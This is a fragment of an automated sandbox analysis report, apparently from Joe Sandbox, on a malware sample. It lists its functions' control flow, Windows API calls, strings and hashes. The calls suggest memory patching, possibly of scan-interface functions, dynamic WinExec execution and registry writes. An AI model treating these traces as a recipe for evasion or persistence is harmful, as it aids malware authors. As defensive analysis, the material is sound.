                                                          control_flow_graph 11514 28f1a8c-28f1a9b 11515 28f1b6c-28f1b6f 11514->11515 11516 28f1aa1-28f1aa5 11514->11516 11517 28f1c5c-28f1c60 11515->11517 11518 28f1b75-28f1b7f 11515->11518 11519 28f1b08-28f1b11 11516->11519 11520 28f1aa7-28f1aae 11516->11520 11526 28f16e8-28f170b call 28f1644 VirtualFree 11517->11526 11527 28f1c66-28f1c6b 11517->11527 11522 28f1b3c-28f1b49 11518->11522 11523 28f1b81-28f1b8d 11518->11523 11519->11520 11521 28f1b13-28f1b27 Sleep 11519->11521 11524 28f1adc-28f1ade 11520->11524 11525 28f1ab0-28f1abb 11520->11525 11521->11520 11528 28f1b2d-28f1b38 Sleep 11521->11528 11522->11523 11529 28f1b4b-28f1b5f Sleep 11522->11529 11530 28f1b8f-28f1b92 11523->11530 11531 28f1bc4-28f1bd2 11523->11531 11534 28f1af3 11524->11534 11535 28f1ae0-28f1af1 11524->11535 11532 28f1abd-28f1ac2 11525->11532 11533 28f1ac4-28f1ad9 11525->11533 11542 28f170d-28f1714 11526->11542 11543 28f1716 11526->11543 11528->11519 11529->11523 11541 28f1b61-28f1b68 Sleep 11529->11541 11539 28f1b96-28f1b9a 11530->11539 11531->11539 11540 28f1bd4-28f1bd9 call 28f14c0 11531->11540 11537 28f1af6-28f1b03 11534->11537 11535->11534 11535->11537 11537->11518 11545 28f1bdc-28f1be9 11539->11545 11546 28f1b9c-28f1ba2 11539->11546 11540->11539 11541->11522 11547 28f1719-28f1723 11542->11547 11543->11547 11545->11546 11549 28f1beb-28f1bf2 call 28f14c0 11545->11549 11550 28f1bf4-28f1bfe 11546->11550 11551 28f1ba4-28f1bc2 call 28f1500 11546->11551 11549->11546 11553 28f1c2c-28f1c59 call 28f1560 11550->11553 11554 28f1c00-28f1c28 VirtualFree 11550->11554
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,?,?,00000000,028F1FE4), ref: 028F1B17
                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,028F1FE4), ref: 028F1B31
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 53e987e99ac2e53048e1fe2ef9f792d8b82bf7467ff58d178b226a6e73b8f3ff
                                                          • Instruction ID: 4e415e5d6733ba590a5dd5fc5df75005f805223d67cfc53b855cabce7fd777fe
                                                          • Opcode Fuzzy Hash: 53e987e99ac2e53048e1fe2ef9f792d8b82bf7467ff58d178b226a6e73b8f3ff
                                                          • Instruction Fuzzy Hash: 6251B07D605240CFD795CF6CC988766BBE0AB46328F1885AED64CCB286E770C445CBA2
                                                          Function 0290E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E5F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CheckConnectionInternet
                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                          • API String ID: 3847983778-3852638603
                                                          • Opcode ID: 32b18cc4e2eb5b705ec04cbbe1e2b4baba3406ad6b5f0ded82a98649195de124
                                                          • Instruction ID: de7d45e613eade656e24e95e0267b55e15c626deaa44a8899ce778ce645aca10
                                                          • Opcode Fuzzy Hash: 32b18cc4e2eb5b705ec04cbbe1e2b4baba3406ad6b5f0ded82a98649195de124
                                                          • Instruction Fuzzy Hash: 8141133DB1010D9FEB41EBA8D881ADF73FAEF88700F104426E641E7291DA75AD018F56
                                                          Function 029085BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • WinExec.KERNEL32(?,?), ref: 02908624
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$Exec
                                                          • String ID: Kernel32$WinExec
                                                          • API String ID: 2292790416-3609268280
                                                          • Opcode ID: aef07323a2ffd57e66b78476f1ca09e25d7e57f4973daa23fcf4d77bdc2ec59d
                                                          • Instruction ID: 83aa1535c61e58ef0e08d11eeabec55ffa302d0401f91c59e92252d72c98692c
                                                          • Opcode Fuzzy Hash: aef07323a2ffd57e66b78476f1ca09e25d7e57f4973daa23fcf4d77bdc2ec59d
                                                          • Instruction Fuzzy Hash: D8018178784308BFEB40EBE8EC81F6A77EDFB88B00F514461BA04D6680D670AD108A65
                                                          Function 029085BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • WinExec.KERNEL32(?,?), ref: 02908624
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$Exec
                                                          • String ID: Kernel32$WinExec
                                                          • API String ID: 2292790416-3609268280
                                                          • Opcode ID: f9e19bd291aa5e894e5160548dda4055f6e916810b161120fcab98bb900e492a
                                                          • Instruction ID: ee0f56a507bf1df700794156f961db20a163b5319d02642a66ab8797dc87178d
                                                          • Opcode Fuzzy Hash: f9e19bd291aa5e894e5160548dda4055f6e916810b161120fcab98bb900e492a
                                                          • Instruction Fuzzy Hash: 50F08178784308BFEB40EBE8EC81F6A77EDFB88B00F514461BA04D6680D670AD108A65
                                                          Function 02905C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02905D74,?,?,02903900,00000001), ref: 02905C88
                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02905D74,?,?,02903900,00000001), ref: 02905CB6
                                                            • Part of subcall function 028F7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02903900,02905CF6,00000000,02905D74,?,?,02903900), ref: 028F7DAA
                                                            • Part of subcall function 028F7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02903900,02905D11,00000000,02905D74,?,?,02903900,00000001), ref: 028F7FB7
                                                          • GetLastError.KERNEL32(00000000,02905D74,?,?,02903900,00000001), ref: 02905D1B
                                                            • Part of subcall function 028FA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,028FC3D9,00000000,028FC433), ref: 028FA797
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                          • String ID:
                                                          • API String ID: 503785936-0
                                                          • Opcode ID: 6d04214e6820e748aea69329106601bf305b47296fc64002d62628e85bab3fd2
                                                          • Instruction ID: 7511205bfdd3c302922f177b6a8cfa8f1a420139c0bc0a54dd2cecab21a0e7e7
                                                          • Opcode Fuzzy Hash: 6d04214e6820e748aea69329106601bf305b47296fc64002d62628e85bab3fd2
                                                          • Instruction Fuzzy Hash: 8E319378A006099FDB40EFA8C881BAEB7F6BF48700F918565D604EB3D0E7755D048FA6
                                                          Function 0290F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A6BA58), ref: 0290F258
                                                          • RegSetValueExA.ADVAPI32(00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F290
                                                          • RegCloseKey.ADVAPI32(00000884,00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F29B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenValue
                                                          • String ID:
                                                          • API String ID: 779948276-0
                                                          • Opcode ID: dfb55a50c172fb1f10267975d8694654a806ae7fb705cbf27dbc9ee91a5543ac
                                                          • Instruction ID: 555db5e2d7a5572f0af47e8551dbb277e2c16c22dac49022af2d8005f1e2714b
                                                          • Opcode Fuzzy Hash: dfb55a50c172fb1f10267975d8694654a806ae7fb705cbf27dbc9ee91a5543ac
                                                          • Instruction Fuzzy Hash: C311FEB9740208AFD740EF6CD88595A77EDEB08700B404962FB14E7650EB31DA418F65
                                                          Function 0290F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A6BA58), ref: 0290F258
                                                          • RegSetValueExA.ADVAPI32(00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F290
                                                          • RegCloseKey.ADVAPI32(00000884,00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0290F2C3), ref: 0290F29B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenValue
                                                          • String ID:
                                                          • API String ID: 779948276-0
                                                          • Opcode ID: 748e7a6732feb1cec8dd7a63014fdfd92cae1f20400bba065c2b5e4a4d8f3f81
                                                          • Instruction ID: 771dc22c3baaf8658cda7965ddc6f8c3492bfd9706635040c486f3a5b299a2a7
                                                          • Opcode Fuzzy Hash: 748e7a6732feb1cec8dd7a63014fdfd92cae1f20400bba065c2b5e4a4d8f3f81
                                                          • Instruction Fuzzy Hash: 8211FBB9740208AFDB40EFACD88599A77ADEB08700B404962FB14E7650EB31EA418F65
                                                          Function 028FE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: b2480b1dd8cc4e38e42248aeefb1d9c0b1ec74722d6a1d39fe984ee7ac750093
                                                          • Instruction ID: e33698308535a2e5734c8d12fe8529448c147584ef5b862e08c31879a133e5a0
                                                          • Opcode Fuzzy Hash: b2480b1dd8cc4e38e42248aeefb1d9c0b1ec74722d6a1d39fe984ee7ac750093
                                                          • Instruction Fuzzy Hash: FCF0AF2D708118CB8BA0BF3D8C8C66E279A5F407447081436A74ADB171CB649C49CB63
                                                          Function 028F4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 028F4D5B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 028F4D6D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                          • Instruction ID: 15d78c39510a66dea185769363c708af75a73d048fc189bbd7025b9ff6c4c3b1
                                                          • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                          • Instruction Fuzzy Hash: 07E02BBC2012059EFFC4AF21CC44B37332AAFC1741B24809AEB08CE014E739D440AD38
                                                          Function 029070DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysFreeString.OLEAUT32(?), ref: 029073DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeString
                                                          • String ID: H
                                                          • API String ID: 3341692771-2852464175
                                                          • Opcode ID: 188757b84dc2cf0fadf594f61ffbc7434b565e31efbd4488adfaa5bd643db001
                                                          • Instruction ID: d528acaf062e034d77347c6af34bf9a90ae1c5bd47133afc697afc52687404d8
                                                          • Opcode Fuzzy Hash: 188757b84dc2cf0fadf594f61ffbc7434b565e31efbd4488adfaa5bd643db001
                                                          • Instruction Fuzzy Hash: 78B1B078A016089FDB15CF99E4C0A9DFBF6FF89324F248569E945AB3A0D730A845CF50
                                                          Function 028FE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 028FE781
                                                            • Part of subcall function 028FE364: VariantClear.OLEAUT32(?), ref: 028FE373
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Variant$ClearCopy
                                                          • String ID:
                                                          • API String ID: 274517740-0
                                                          • Opcode ID: 0a34949383bf7d13b5a3faae043f40005bfcacec78baab6887ec5ebd1c258b03
                                                          • Instruction ID: 1f6b21d46ef36d1a60e6eb46bb518b55e877ee295fc711fdc9d50fa31a01a2e5
                                                          • Opcode Fuzzy Hash: 0a34949383bf7d13b5a3faae043f40005bfcacec78baab6887ec5ebd1c258b03
                                                          • Instruction Fuzzy Hash: 4411702C7102148BC7B0AF2DC8C4A6A679AAF847507108466E74ACB675DB30DC45CA62
                                                          Function 028FE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitVariant
                                                          • String ID:
                                                          • API String ID: 1927566239-0
                                                          • Opcode ID: 3e086dd32d2f9f2b1e5f95cb241ee66af64b0feb9c9c6f036bcf0239cf0c7956
                                                          • Instruction ID: 9e902b74b930a18956becd8094daf0d1ee2f75a43b72eee53ad5c8772332f27d
                                                          • Opcode Fuzzy Hash: 3e086dd32d2f9f2b1e5f95cb241ee66af64b0feb9c9c6f036bcf0239cf0c7956
                                                          • Instruction Fuzzy Hash: 4931647D6005089FDB90DFACD884AAE77E9EB1C304F448469FB09D3260D734D950CBA6
                                                          Function 029089D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                            • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                            • Part of subcall function 02908338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029083C2), ref: 029083A4
                                                          • FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 1478290883-0
                                                          • Opcode ID: 743e89804e6285e9b24dc83e1f57a8eb724da7f53052287bb5baac1b03f9417b
                                                          • Instruction ID: cd241b581d75b849b6a2189c0de25758004064d396056d454b45ab03aa67b7be
                                                          • Opcode Fuzzy Hash: 743e89804e6285e9b24dc83e1f57a8eb724da7f53052287bb5baac1b03f9417b
                                                          • Instruction Fuzzy Hash: 65213978780308AFE740F7F9EC46B9EB7A9EB84710F500461BB14E72D0D674A9409E2D
                                                          Function 02906D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02906DB9,?,?,?,00000000), ref: 02906D99
                                                            • Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
